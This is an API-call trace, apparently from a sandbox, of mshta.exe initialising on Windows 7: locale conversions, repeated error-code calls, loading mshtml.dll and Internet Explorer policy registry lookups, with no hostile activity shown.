[0062.915] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x2aebd0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256
[0062.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x2af360, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256
[0062.915] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xff9da700, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] GetLastError () returned 0x0
[0062.915] SetLastError (dwErrCode=0x0)
[0062.915] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.916] SetLastError (dwErrCode=0x0)
[0062.916] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.917] GetLastError () returned 0x0
[0062.917] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.918] GetLastError () returned 0x0
[0062.918] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.919] SetLastError (dwErrCode=0x0)
[0062.919] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.920] GetLastError () returned 0x0
[0062.920] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.921] SetLastError (dwErrCode=0x0)
[0062.921] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9d2cc4) returned 0x0
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.922] SetLastError (dwErrCode=0x0)
[0062.922] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetLastError () returned 0x0
[0062.923] SetLastError (dwErrCode=0x0)
[0062.923] GetVersion () returned 0x1db10106
[0062.924] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x776e0000
[0062.924] GetProcAddress (hModule=0x776e0000, lpProcName="HeapSetInformation") returned 0x776fc4a0
[0062.924] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0062.924] RegOpenKeyExA (in: hKey=0xffffffff80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x2af768 | out: phkResult=0x2af768*=0x2a) returned 0x0
[0062.924] RegQueryValueExA (in: hKey=0x2a, lpValueName=0x0, lpReserved=0x0, lpType=0x2af760, lpData=0x6d5d40, lpcbData=0x2af764*=0x105 | out: lpType=0x2af760*=0x1, lpData="C:\\Windows\\System32\\mshtml.dll", lpcbData=0x2af764*=0x1f) returned 0x0
[0062.924] LoadLibraryA (lpLibFileName="C:\\Windows\\System32\\mshtml.dll") returned 0x7fee0880000
[0063.311] HeapSetInformation (HeapHandle=0x370000, HeapInformationClass=0x0, HeapInformation=0x2af1a8, HeapInformationLength=0x4) returned 1
[0063.311] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af170 | out: lpSystemTimeAsFileTime=0x2af170*(dwLowDateTime=0xd5c540f0, dwHighDateTime=0x1d34cee))
[0063.311] GetCurrentProcessId () returned 0xbc0
[0063.311] GetCurrentThreadId () returned 0xbc4
[0063.311] GetTickCount () returned 0x1f23a
[0063.311] QueryPerformanceCounter (in: lpPerformanceCount=0x2af178 | out: lpPerformanceCount=0x2af178*=480098161) returned 1
[0063.311] GetVersionExA (in: lpVersionInformation=0x2aeed0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2aeed0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0063.311] __dllonexit () returned 0x7fee094a28c
[0063.311] __dllonexit () returned 0x7fee094e5b4
[0063.311] __dllonexit () returned 0x7fee0944de0
[0063.312] __dllonexit () returned 0x7fee0944e0c
[0063.312] __dllonexit () returned 0x7fee09478c0
[0063.312] __dllonexit () returned 0x7fee0949f60
[0063.312] __dllonexit () returned 0x7fee0944dac
[0063.316] __dllonexit () returned 0x7fee094a204
[0063.316] __dllonexit () returned 0x7fee0944dc0
[0063.316] __dllonexit () returned 0x7fee09445c0
[0063.316] __dllonexit () returned 0x7fee09445d0
[0063.316] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc193
[0063.316] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc193
[0063.316] __dllonexit () returned 0x7fee0944600
[0063.316] __dllonexit () returned 0x7fee0944630
[0063.316] __dllonexit () returned 0x7fee0944670
[0063.316] __dllonexit () returned 0x7fee0944690
[0063.317] __dllonexit () returned 0x7fee09446c0
[0063.317] __dllonexit () returned 0x7fee0949fd0
[0063.317] __dllonexit () returned 0x7fee09446e0
[0063.317] __dllonexit () returned 0x7fee0944700
[0063.317] __dllonexit () returned 0x7fee0944720
[0063.317] __dllonexit () returned 0x7fee0944740
[0063.317] __dllonexit () returned 0x7fee0944760
[0063.317] __dllonexit () returned 0x7fee094a000
[0063.317] __dllonexit () returned 0x7fee0944780
[0063.317] __dllonexit () returned 0x7fee09447a0
[0063.317] __dllonexit () returned 0x7fee09447d0
[0063.317] __dllonexit () returned 0x7fee09447f0
[0063.317] __dllonexit () returned 0x7fee0944810
[0063.317] __dllonexit () returned 0x7fee0944830
[0063.317] __dllonexit () returned 0x7fee0944850
[0063.317] __dllonexit () returned 0x7fee0944870
[0063.317] __dllonexit () returned 0x7fee0944890
[0063.317] __dllonexit () returned 0x7fee09448b0
[0063.317] __dllonexit () returned 0x7fee09448d0
[0063.318] __dllonexit () returned 0x7fee09448f0
[0063.318] __dllonexit () returned 0x7fee0944910
[0063.318] __dllonexit () returned 0x7fee0944930
[0063.318] __dllonexit () returned 0x7fee0944950
[0063.318] __dllonexit () returned 0x7fee0944970
[0063.318] __dllonexit () returned 0x7fee0944990
[0063.318] __dllonexit () returned 0x7fee09449b0
[0063.318] __dllonexit () returned 0x7fee09449d0
[0063.318] __dllonexit () returned 0x7fee09449f0
[0063.318] __dllonexit () returned 0x7fee0944a10
[0063.318] __dllonexit () returned 0x7fee0944a40
[0063.318] __dllonexit () returned 0x7fee0944a70
[0063.318] __dllonexit () returned 0x7fee0944aa0
[0063.318] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0063.318] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0063.318] __dllonexit () returned 0x7fee0944ab0
[0063.319] __dllonexit () returned 0x7fee094a0d0
[0063.319] __dllonexit () returned 0x7fee0944ae0
[0063.319] __dllonexit () returned 0x7fee0944af0
[0063.319] __dllonexit () returned 0x7fee0944b10
[0063.319] __dllonexit () returned 0x7fee0944b30
[0063.319] __dllonexit () returned 0x7fee094a100
[0063.319] __dllonexit () returned 0x7fee0944b50
[0063.319] __dllonexit () returned 0x7fee0944b70
[0063.319] __dllonexit () returned 0x7fee0944b90
[0063.319] __dllonexit () returned 0x7fee0944bb0
[0063.319] __dllonexit () returned 0x7fee0944bd0
[0063.319] __dllonexit () returned 0x7fee0944bf0
[0063.319] __dllonexit () returned 0x7fee0944c10
[0063.319] __dllonexit () returned 0x7fee0944c30
[0063.360] __dllonexit () returned 0x7fee0944c50
[0063.360] __dllonexit () returned 0x7fee0944c70
[0063.360] __dllonexit () returned 0x7fee0944c90
[0063.360] __dllonexit () returned 0x7fee0944cb0
[0063.360] __dllonexit () returned 0x7fee0944cd0
[0063.360] __dllonexit () returned 0x7fee094e500
[0063.360] __dllonexit () returned 0x7fee0944cf0
[0063.360] __dllonexit () returned 0x7fee094a150
[0063.360] __dllonexit () returned 0x7fee094a190
[0063.361] __dllonexit () returned 0x7fee0944d1c
[0063.361] __dllonexit () returned 0x7fee0944d3c
[0063.361] __dllonexit () returned 0x7fee0944d50
[0063.361] GetCurrentThreadId () returned 0xbc4
[0063.361] CoCreateGuid (in: pguid=0x7fee10449d0 | out: pguid=0x7fee10449d0*(Data1=0x4c405704, Data2=0x1716, Data3=0x45aa, Data4=([0]=0xba, [1]=0xd0, [2]=0x51, [3]=0xd0, [4]=0x99, [5]=0xa3, [6]=0x50, [7]=0xdc))) returned 0x0
[0063.363] __dllonexit () returned 0x7fee094a1b8
[0063.363] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ae880, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0063.363] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0063.363] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4
[0063.363] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8
[0063.373] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x39a8c0
[0063.373] SHRegGetValueW () returned 0x2
[0063.373] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb08 | out: phkResult=0x2aeb08*=0x0) returned 0x2
[0063.373] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2aeb10 | out: phkResult=0x2aeb10*=0x0) returned 0x2
